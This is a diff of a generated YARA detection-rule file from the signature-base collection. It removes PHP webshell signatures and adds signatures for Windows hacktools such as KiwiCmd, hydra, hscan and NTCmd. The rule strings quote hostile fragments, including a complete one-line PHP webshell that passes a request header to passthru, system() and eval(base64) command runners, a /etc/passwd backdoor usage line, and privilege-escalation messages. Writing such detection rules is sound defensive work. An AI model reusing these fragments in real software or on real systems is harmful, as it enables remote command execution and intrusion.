 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if(($_POST['exe']) == \"Execute\") {" fullword
-		$s8 = "$curcmd = $_POST['king'];" fullword
-		$s16 = "\"http://www.w3.org/TR/html4/loose.dtd\">" fullword
-		$s18 = "<title>lama's'hell v. 3.0</title>" fullword
-		$s19 = "_|_  O    _    O  _|_"
-		$s20 = "$curcmd = \"ls -lah\";" fullword
+		$s1 = "Done, command should have ran as SYSTEM!" ascii
+		$s2 = "Running command with SYSTEM Token..." ascii
+		$s3 = "Thread impersonating, got NETWORK SERVICE Token: 0x%x" ascii
+		$s4 = "Found SYSTEM token 0x%x" ascii
+		$s5 = "Thread not impersonating, looking for another thread..." ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_Simple_PHP_Backdoor_By_DK
+rule SIGNATURE_BASE_X64_Kiwicmd : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php"
+		description = "Chinese Hacktool Set - file KiwiCmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2c424714-1d2c-5b89-b1bc-a201e37a0a5d"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6157-L6172"
+		id = "df759fd4-5d42-5dd9-81d0-ceccafcdd64d"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1682-L1697"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "03f6215548ed370bec0332199be7c4f68105274e"
-		logic_hash = "1f65f759ec4045c521085aad84d0aea4dcfcf26eac4357751cf1dde6886d1718"
+		hash = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
+		logic_hash = "b49a70a49a67fbb57d643b38155482177f594bd1f01f5464c4f36b265aac48d8"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
-		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
-		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
-		$s6 = "if(isset($_REQUEST['cmd'])){" fullword
-		$s8 = "system($cmd);" fullword
+		$s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide
+		$s2 = "Kiwi Cmd no-gpo" fullword wide
+		$s3 = "KiwiAndCMD" fullword wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_Moroccan_Spamers_Ma_Edition_By_Ghost
+rule SIGNATURE_BASE_Sql1433_SQL : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Moroccan Spamers Ma-EditioN By GhOsT.php"
+		description = "Chinese Hacktool Set - file SQL.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4fa9ce70-d300-55fe-bf98-636f026317ec"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6173-L6186"
+		id = "fb4c5958-2e4e-5231-b0db-eca6bc3d823a"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1699-L1715"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "31e5473920a2cc445d246bc5820037d8fe383201"
-		logic_hash = "0e3d2d97665b8849d121d63a22baf7393047a814dde3753e395418c1868b59be"
+		hash = "025e87deadd1c50b1021c26cb67b76b476fafd64"
+		logic_hash = "5ceecc4f345cb603a0b03180f3f09f97e5f951b5d75c469aefffe3ec62916a8f"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "$content = chunk_split(base64_encode($content)); " fullword
-		$s12 = "print \"Sending mail to $to....... \"; " fullword
-		$s16 = "if (!$from && !$subject && !$message && !$emaillist){ " fullword
+		$s0 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 31 00 34 00 33 00 33 }
+		$s1 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 2C 00 34 00 2C 00 33 00 2C 00 33 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 90KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_C99Madshell_V__2_0_Madnet_Edition
+rule SIGNATURE_BASE_Cookietools2 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file C99madShell v. 2.0 madnet edition.php"
+		description = "Chinese Hacktool Set - file CookieTools2.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "51db0495-14f3-527e-865b-1405db57ff27"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6187-L6202"
+		id = "f227ba4b-9cad-5aac-99ab-46a8237249d4"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1717-L1733"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f99f8228eb12746847f54bad45084f19d1a7e111"
-		logic_hash = "7cf825a604783ebc74b1dca53aaff5c886957c562e11276f2acce5ff1f6ab991"
+		hash = "cb67797f229fdb92360319e01277e1345305eb82"
+		logic_hash = "8ddb8ea0bc047877d91f25375745ab8fa66af28b6b41de36e0fb16ea8284fce5"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
-		$s1 = "eval(gzinflate(base64_decode('"
-		$s2 = "$pass = \"\";  //Pass" fullword
-		$s3 = "$login = \"\"; //Login" fullword
-		$s4 = "//Authentication" fullword
+		$s1 = "www.gxgl.com&www.gxgl.net" fullword wide
+		$s2 = "ip.asp?IP=" fullword ascii
+		$s3 = "MSIE 5.5;" fullword ascii
+		$s4 = "SOFTWARE\\Borland\\" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Cmdasp_Asp_Php
+rule SIGNATURE_BASE_Cyclotron : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file CmdAsp.asp.php.txt"
+		description = "Chinese Hacktool Set - file cyclotron.sys"
 		author = "Florian Roth (Nextron Systems)"
-		id = "184b1731-31a9-5040-aa25-d145e8064758"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6203-L6222"
+		id = "7099462b-2a72-56cd-8a50-27cd445eb9d2"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1735-L1752"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cb18e1ac11e37e236e244b96c2af2d313feda696"
-		logic_hash = "0fd9c7e83ad9ddf5cf88f1d1573324d9f24ae03a1951446fe11c116fd0cf4932"
+		hash = "5b63473b6dc1e5942bf07c52c31ba28f2702b246"
+		logic_hash = "f3a0edf54039479c9f4e46b20249465bbe1bca57f47afeba37965e6e3fc0127f"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
-		$s4 = "' Author: Maceo <maceo @ dogmile.com>" fullword
-		$s5 = "' -- Use a poor man's pipe ... a temp file -- '" fullword
-		$s6 = "' --------------------o0o--------------------" fullword
-		$s8 = "' File: CmdAsp.asp" fullword
-		$s11 = "<-- CmdAsp.asp -->" fullword
-		$s14 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
-		$s16 = "Set oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")" fullword
-		$s19 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+		$s1 = "\\Device\\IDTProt" wide
+		$s2 = "IoDeleteSymbolicLink" fullword ascii
+		$s3 = "\\??\\slIDTProt" wide
+		$s4 = "IoDeleteDevice" fullword ascii
+		$s5 = "IoCreateSymbolicLink" fullword ascii
 
 	condition:
-		4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_NCC_Shell
+rule SIGNATURE_BASE_Xscan_Gui : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file NCC-Shell.php"
+		description = "Chinese Hacktool Set - file xscan_gui.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3a2dab3d-faf0-52a5-b114-db402885c618"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6223-L6239"
+		id = "fee11058-e75f-5d8f-8d10-06dcaed99df1"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1754-L1770"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "64d4495875a809b2730bd93bec2e33902ea80a53"
-		logic_hash = "c58edc548b7804be25f6956e9407cc9f8c74dfd8651f601a87ba639284e612d9"
+		hash = "a9e900510396192eb2ba4fb7b0ef786513f9b5ab"
+		logic_hash = "366db7eb19725a0a42ce371d7bfb50a22a259f0bc0252927af626e8c1c0b9b59"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = " if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {" fullword
-		$s1 = "<b>--Coded by Silver" fullword
-		$s2 = "<title>Upload - Shell/Datei</title>" fullword
-		$s8 = "<a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->NCC<--</a></center></b><"
-		$s14 = "~|_Team .:National Cracker Crew:._|~<br>" fullword
-		$s18 = "printf(\"Sie ist %u Bytes gro" fullword
+		$s1 = "%s -mutex %s -host %s -index %d -config \"%s\"" fullword ascii
+		$s2 = "www.target.com" fullword ascii
+		$s3 = "%s\\scripts\\desc\\%s.desc" fullword ascii
+		$s4 = "%c Active/Maximum host thread: %d/%d, Current/Maximum thread: %d/%d, Time(s): %l" ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_README
+rule SIGNATURE_BASE_CN_Tools_Hscan : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file README.md"
+		description = "Chinese Hacktool Set - file hscan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6240-L6252"
+		id = "82d9cd61-8cef-56b4-8dfe-a28edaa781b8"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1772-L1792"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ef2c567b4782c994db48de0168deb29c812f7204"
-		logic_hash = "aa8a9be74bbac08518d5ba442aa6fa37d3f1b255df48b49ccb9842f5728a49d5"
+		hash = "17a743e40790985ececf5c66eaad2a1f8c4cffe8"
+		logic_hash = "9bc4800249bffcc4b8fc1191d600f0b9b2a7b0c1f067039c83c03671a0b4b5c5"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Common php webshells. Do not host the file(s) in your server!" fullword
-		$s1 = "php-webshells" fullword
+		$s1 = "%s -f hosts.txt -port -ipc -pop -max 300,20 -time 10000" fullword ascii
+		$s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,20" fullword ascii
+		$s3 = "%s -h www.target.com -all" fullword ascii
+		$s4 = ".\\report\\%s-%s.html" fullword ascii
+		$s5 = ".\\log\\Hscan.log" fullword ascii
+		$s6 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii
+		$s7 = "%s@ftpscan#FTP Account:  %s/[null]" fullword ascii
+		$s8 = ".\\conf\\mysql_pass.dic" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Backupsql
+rule SIGNATURE_BASE_Goodtoolset_Pr : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file backupsql.php"
+		description = "Chinese Hacktool Set - file pr.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "15d6e967-1e53-53b4-a2cf-7786452495d4"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6253-L6268"
+		id = "d00e1873-f2a5-5e89-9223-ead418e2667c"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1794-L1812"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "863e017545ec8e16a0df5f420f2d708631020dd4"
-		logic_hash = "0126bfad6eb3861e8322ac3e11b4fd95bc8b88597d916e66c6646d7d5529c1d5"
+		hash = "f6676daf3292cff59ef15ed109c2d408369e8ac8"
+		logic_hash = "0673bc445422f4339c9e81ff8ae8a9b2bb9bc1f107b85fe34906444a1754c43b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$headers .= \"\\nMIME-Version: 1.0\\n\" .\"Content-Type: multipart/mixed;\\n\" ."
-		$s1 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
-		$s2 = "* as email attachment, or send to a remote ftp server by" fullword
-		$s16 = "* Neagu Mihai<neagumihai@hotmail.com>" fullword
-		$s17 = "$from    = \"Neu-Cool@email.com\";  // Who should the emails be sent from?, may "
+		$s1 = "-->Got WMI process Pid: %d " ascii
+		$s2 = "-->This exploit gives you a Local System shell " ascii
+		$s3 = "wmiprvse.exe" fullword ascii
+		$s4 = "Try the first %d time" fullword ascii
+		$s5 = "-->Build&&Change By p " ascii
+		$s6 = "root\\MicrosoftIISv2" fullword wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_AK_74_Security_Team_Web_Shell_Beta_Version
+rule SIGNATURE_BASE_Hydra_7_4_1_Hydra : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php"
+		description = "Chinese Hacktool Set - file hydra.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e93a6ac3-080f-53d3-8368-b9feb509a2ea"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6269-L6282"
+		id = "cf692bea-091d-5be0-a012-caba01e96dde"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1814-L1832"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c90b0ba575f432ecc08f8f292f3013b5532fe2c4"
-		logic_hash = "4fbf8f5cab8593fd88e5a430b849e61d7d663c13700f459aa516c5b337d5438b"
+		hash = "3411d0380a1c1ebf58a454765f94d4f1dd714b5b"
+		logic_hash = "f52696cbf7355c982d1a1e0c73dce65324845c5ffc13c541e326720332b4788d"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s8 = "- AK-74 Security Team Web Site: www.ak74-team.net" fullword
-		$s9 = "<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'."
-		$s10 = "<b><font color=#83000>Execute system commands!</font></b>" fullword
+		$s1 = "%d of %d target%s%scompleted, %lu valid password%s found" fullword ascii
+		$s2 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii
+		$s3 = "hydra -P pass.txt target cisco-enable  (direct console access)" fullword ascii
+		$s4 = "[%d][smb] Host: %s Account: %s Error: PASSWORD EXPIRED" fullword ascii
+		$s5 = "[ERROR] SMTP LOGIN AUTH, either this auth is disabled" fullword ascii
+		$s6 = "\"/login.php:user=^USER^&pass=^PASS^&mid=123:incorrect\"" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Cpanel
+rule SIGNATURE_BASE_CN_Tools_Srss_2 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file cpanel.php"
+		description = "Chinese Hacktool Set - file srss.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6283-L6299"
+		id = "3a84fa58-ccd0-5cf0-b1e0-a8f2ca04fd3f"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1834-L1856"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "433dab17106b175c7cf73f4f094e835d453c0874"
-		logic_hash = "e4dc90c52648f1e5b7dc2d77dcb94feb774ec9e3c156c923c54a9e8f537bbf07"
+		hash = "c418b30d004051bbf1b2d3be426936b95b5fea6f"
+		logic_hash = "e674ac7a99a67e2ebe8b4c4232e3435dd041b794f6c08a87ef7b8179127d6fc7"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "function ftp_check($host,$user,$pass,$timeout){" fullword
-		$s3 = "curl_setopt($ch, CURLOPT_URL, \"http://$host:2082\");" fullword
-		$s4 = "[ user@alturks.com ]# info<b><br><font face=tahoma><br>" fullword
-		$s12 = "curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);" fullword
-		$s13 = "Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir"
-		$s20 = "<br><b>Please enter your USERNAME and PASSWORD to logon<br>" fullword
+		$x1 = "used pepack!" fullword ascii
+		$s1 = "KERNEL32.dll" fullword ascii
+		$s2 = "KERNEL32.DLL" fullword ascii
+		$s3 = "LoadLibraryA" fullword ascii
+		$s4 = "GetProcAddress" fullword ascii
+		$s5 = "VirtualProtect" fullword ascii
+		$s6 = "VirtualAlloc" fullword ascii
+		$s7 = "VirtualFree" fullword ascii
+		$s8 = "ExitProcess" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and ( $x1 at 0 ) and filesize < 14KB and all of ( $s* )
 }
-rule SIGNATURE_BASE_Webshell_Accept_Language
+rule SIGNATURE_BASE_Dos_Ntgod : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file accept_language.php"
+		description = "Chinese Hacktool Set - file NtGod.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "343ed2a4-4bed-5e73-8d05-f9573b0147af"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6300-L6311"
+		id = "c2f0733d-5519-5cb8-b077-0ae8472400b4"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1858-L1874"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "180b13576f8a5407ab3325671b63750adbcb62c9"
-		logic_hash = "6d45071722268f5b39b1486a7dce883ecefb2b3c9993357b7b58bd603ff1c40d"
+		hash = "adefd901d6bbd8437116f0170b9c28a76d4a87bf"
+		logic_hash = "77b9204add5d25dcc36eabc07cabea2bdc67a23873c2faf7706e7fba5ed53f8b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php passthru(getenv(\"HTTP_ACCEPT_LANGUAGE\")); echo '<br> by q1w2e3r4'; ?>" fullword
+		$s0 = "\\temp\\NtGodMode.exe" ascii
+		$s4 = "NtGodMode.exe" fullword ascii
+		$s10 = "ntgod.bat" fullword ascii
+		$s19 = "sfxcmd" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_529
+rule SIGNATURE_BASE_CN_Tools_Vnclink : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file 529.php"
+		description = "Chinese Hacktool Set - file VNCLink.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6312-L6329"
+		id = "270dc14c-ac8f-58c2-b4ac-c10981e20a07"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1876-L1891"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ba3fb2995528307487dff7d5b624d9f4c94c75d3"
-		logic_hash = "f46b84d51077f157c83cd01534dfe7f9cd0d9ef04ad9935ced22d2abc873c171"
+		hash = "cafb531822cbc0cfebbea864489eebba48081aa1"
+		logic_hash = "21328e2a871dfcfda47991a1f1e897efd27471420d644c09a94004cf5b0f9869"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<p>More: <a href=\"/\">Md5Cracking.Com Crew</a> " fullword
-		$s7 = "href=\"/\" title=\"Securityhouse\">Security House - Shell Center - Edited By Kin"
-		$s9 = "echo '<PRE><P>This is exploit from <a " fullword
-		$s10 = "This Exploit Was Edited By KingDefacer" fullword
-		$s13 = "safe_mode and open_basedir Bypass PHP 5.2.9 " fullword
-		$s14 = "$hardstyle = explode(\"/\", $file); " fullword
-		$s20 = "while($level--) chdir(\"..\"); " fullword
+		$s1 = "C:\\temp\\vncviewer4.log" fullword ascii
+		$s2 = "[BL4CK] Patched by redsand || http://blacksecurity.org" fullword ascii
+		$s3 = "fake release extendedVkey 0x%x, keysym 0x%x" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 580KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_STNC_Webshell_V0_8
+rule SIGNATURE_BASE_Tools_Ntcmd : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file STNC WebShell v0.8.php"
+		description = "Chinese Hacktool Set - file NTCmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5dc300a2-9965-52e3-a382-b8d327eb7029"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6330-L6343"
+		id = "db3f28d6-dfe8-5c79-a11b-e31701e250d7"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1893-L1911"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "52068c9dff65f1caae8f4c60d0225708612bb8bc"
-		logic_hash = "c2067a1b78c441aa05366b612090e0df895c621843038cc9e65beb6719c0cb9a"
+		hash = "a3ae8659b9a673aa346a60844208b371f7c05e3c"
+		logic_hash = "c2487306a0d82ab76a048c001361c25bcd61d0f7a57a3b22df1c70299f0a72ba"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "if(isset($_POST[\"action\"])) $action = $_POST[\"action\"];" fullword
-		$s8 = "elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()"
-		$s13 = "{ $pwd = $_POST[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw"
+		$s1 = "pipecmd \\\\%s -U:%s -P:\"\" %s" fullword ascii
+		$s2 = "[Usage]:  %s <HostName|IP> <Username> <Password>" fullword ascii
+		$s3 = "pipecmd \\\\%s -U:%s -P:%s %s" fullword ascii
+		$s4 = "============By uhhuhy (Feb 18,2003) - http://www.cnhonker.net============" fullword ascii
+		$s5 = "=======================NTcmd v0.11 for HScan v1.20=======================" fullword ascii
+		$s6 = "NTcmd>" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 80KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Tryag
+rule SIGNATURE_BASE_Mysql_Pwd_Crack : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file tryag.php"
+		description = "Chinese Hacktool Set - file mysql_pwd_crack.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
